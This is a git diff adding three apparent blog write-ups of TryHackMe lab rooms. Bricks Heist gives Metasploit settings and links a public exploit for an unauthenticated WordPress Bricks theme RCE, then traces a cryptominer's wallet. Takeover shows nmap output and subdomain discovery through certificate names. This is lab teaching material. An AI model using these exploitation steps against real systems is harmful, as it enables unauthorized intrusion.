diff --git a/_posts/2024-9-10-tryhackme-publisher.md b/_posts/2024-9-10-tryhackme-publisher.md new file mode 100644 index 0000000..e20f15c --- /dev/null +++ b/_posts/2024-9-10-tryhackme-publisher.md @@ -0,0 +1,10 @@ +--- +title: 'TryHackMe: Publisher' +author: AmcaQt +categories: [TryHackMe] +tags: [web, enumeration, subdomain, subdomain takeover] +render_with_liquid: false +media_subpath: /images/thm_publisher/ +image: + path: room_card.png +--- \ No newline at end of file diff --git a/_posts/2024-9-5-tryhackme-bricks-heist.md b/_posts/2024-9-5-tryhackme-bricks-heist.md new file mode 100644 index 0000000..ce3eaab --- /dev/null +++ b/_posts/2024-9-5-tryhackme-bricks-heist.md @@ -0,0 +1,119 @@ +--- +title: 'TryHackMe: TryHack3M: Bricks Heist' +author: AmcaQt +categories: [TryHackMe] +tags: [web, enumeration, rce] +render_with_liquid: false +media_subpath: /images/thm_bricks_heist/ +image: + path: room_card.png +--- + +![Tryhackme Room Link](room_image.PNG){: width="600" height="150" .shadow } +__ + +## Description + +Brick Press Media Co. was working on creating a brand-new web theme that represents a renowned wall using three million byte bricks. Agent Murphy comes with a streak of bad luck. And here we go again: the server is compromised, and they've lost access. + +Can you hack back the server and identify what happened there? + +Note : Add `MACHINE_IP bricks.thm` to your /etc/hosts file. + +## Question & Flag + +### What is the content of the hidden .txt file in the web folder? + +First, before do further enumaration, let's run the basic scan with nmap + +![Nmap Scan](scan.PNG) + +Interesting find here, without wasting any time let's look further with [**WpScan**](https://www.kali.org/tools/wpscan/) + +![](2.PNG) + +The scan shows the site using Theme `bricks` with version `1.9.5`, after some research and finding we found the version is Vuln to Unauthenticated RCE + +![Remote Code Execution](3.PNG) + +The exploit and cve for the version is on github but i want to use metasploit to speed up the exploit +> https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT + +Power up your msfconsole and search for bricks, you shall find the matching modules + +![](4.PNG) + +simply use command use 0 and fill in the require and you shall get the shell + +![](5.PNG) + +```Command +set LHOST 10.8.58.21 +set RHOSTS https://bricks.thm +set RPORT 443 +run +``` + +with that you may find the answer for Task 1 + +![](6.jpg) + +### What is the name of the suspicious process? & What is the service name affiliated with the suspicious process? + +For this one go to google and do some research about it , then you'll found the command + +![](systemctl.PNG) + +get back to the terminal and try out the command + +![](7.PNG) + +but this is not the answer, let's try view the content of the service + +![](8.jpg) + +That's what we want + +### What is the log file name of the miner instance? + +Notice that the service is executing from `/lib/NetworkManager/` directory, go to that directory + +![](9.jpg) + +### What is the wallet address of the miner instance? & The wallet address used has been involved in transactions between wallets belonging to which threat group? + +Using the strings on the log file that we view earlier, try to decode with [**CyberChef**](https://gchq.github.io/CyberChef/) + +![](10.PNG) + +kinda lost on what that is, but since we searched about wallet address so i did some research + +![](wallet.PNG) + +so i need to confirm it, go to [**Blockchair**](https://blockchair.com/) , lucky it was the correct one, so i went down to the last payment received + +![](11.PNG) + +Inside that transaction history and from there, inside the privacy check + +![](12.PNG) + +We can see the details on the transaction + +![](13.PNG) + +Copy the sender address and search it on google, most of the result return `LockBit` + +> Source : +> +> https://ofac.treasury.gov/recent-actions/20240220 +> +> https://www.chainalysis.com/blog/lockbit-takedown-sanctions-february-2024/ + +## Conclusion + +This was fun Room and good for beginner to learn about `CVE` and how risky Outdated version of CMS such as `WordPress`. + +# Happy Hacking + +![Cute Gif](https://i.pinimg.com/originals/c6/ad/84/c6ad8481cee4f75d464b2a14040d06c9.gif) \ No newline at end of file diff --git a/_posts/2024-9-8-tryhackme-takeover.md b/_posts/2024-9-8-tryhackme-takeover.md new file mode 100644 index 0000000..9fb70fc --- /dev/null +++ b/_posts/2024-9-8-tryhackme-takeover.md @@ -0,0 +1,101 @@ +--- +title: 'TryHackMe: Takeover' +author: AmcaQt +categories: [TryHackMe] +tags: [web, enumeration, subdomain, subdomain takeover] +render_with_liquid: false +media_subpath: /images/thm_takeover/ +image: + path: room_card.png +--- + +![Tryhackme Room Link](room_image.PNG){: width="600" height="150" .shadow } +__ + +## Description + +Hello there, + +I am the CEO and one of the co-founders of futurevera.thm. In Futurevera, we believe that the future is in space. We do a lot of space research and write blogs about it. We used to help students with space questions, but we are rebuilding our support. + +Recently blackhat hackers approached us saying they could takeover and are asking us for a big ransom. Please help us to find what they can takeover. + +Our website is located at https://futurevera.thm + +Hint: Don't forget to add the MACHINE_IP in /etc/hosts for futurevera.thm ; ) + +## Basic Scan + +As usual we've been given a MACHINE_IP and need to put it on `/etc/hosts` with a named `futurevera.thm`. Lets run basic scan using Nmap + +```Nmap Scan +┌──(amca㉿amcaqt)-[~] +└─$ nmap -A -T5 futurevera.thm +Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-17 14:19 +08 +Warning: 10.10.200.103 giving up on port because retransmission cap hit (2). +Nmap scan report for futurevera.thm (10.10.200.103) +Host is up (0.20s latency). +Not shown: 910 closed tcp ports (conn-refused), 87 filtered tcp ports (no-response) +PORT STATE SERVICE VERSION +22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0) +| ssh-hostkey: +| 3072 dd:29:a7:0c:05:69:1f:f6:26:0a:d9:28:cd:40:f0:20 (RSA) +| 256 cb:2e:a8:6d:03:66:e9:70:eb:96:e1:f5:ba:25:cb:4e (ECDSA) +|_ 256 50:d3:4b:a8:a2:4d:1d:79:e1:7d:ac:bb:ff:0b:24:13 (ED25519) +80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) +|_http-title: Did not follow redirect to https://futurevera.thm/ +|_http-server-header: Apache/2.4.41 (Ubuntu) +443/tcp open ssl/http Apache httpd 2.4.41 +| ssl-cert: Subject: commonName=futurevera.thm/organizationName=Futurevera/stateOrProvinceName=Oregon/countryName=US +| Not valid before: 2022-03-13T10:05:19 +|_Not valid after: 2023-03-13T10:05:19 +|_http-title: FutureVera +|_http-server-header: Apache/2.4.41 (Ubuntu) +| tls-alpn: +|_ http/1.1 +|_ssl-date: TLS randomness does not represent time +Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel + +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +Nmap done: 1 IP address (1 host up) scanned in 44.43 seconds +``` + +We foundd that there's 3 open port which is : + +`22` ssh +`80` http +`443` ssl/http + +### Subdomain Enumaration + +#### First Subdomain + +The Description mention `support`, which I assume they have `support` as their subdomain, so lets add that in `/etc/hosts` and looks what we can find on that subdomain. View the subdomain on firefox and shall find this : + +![First Subdomain](1st-subdo.PNG) + +#### Second Subdomain + +By clicking the `View Cerificate` you shall find info about the subdomain `support.futurevera.thm`. If you a little lower you'll find Subject Alternative Names with DNS Names `s******************2.support.futurevera.htm` and as usual add the DNS Names in `/etc/hosts` + +![Second Subdomain](2nd-subdo.jpg) + +### What's the value of the flag? + +By viewing the DNS Names on the browser you'll obtain the flag and will be redirect to [AWS Web Server](https://www.geeksforgeeks.org/aws-cloud-architecture-for-web-hosting/). + +![Flag](flag.jpg) + +### Conclusion + +This room was fun and very interesting, it made me search and try to understand what is `Subdomain takeover`, and learned something new with this room. + +If you want to learn more about `Subdomain Takeover` + +- [Book.Hacktricks.xyz](https://book.hacktricks.xyz/pentesting-web/domain-subdomain-takeover) +- [HackerOne](https://www.hackerone.com/application-security/guide-subdomain-takeovers) +- [Developer.Mozilla](https://developer.mozilla.org/en-US/docs/Web/Security/Subdomain_takeovers) + +## Happy Hacking + +![](https://media1.tenor.com/m/aXVFqv8KInAAAAAC/anime-frieren.gif){: width="600" height="150" .shadow } \ No newline at end of file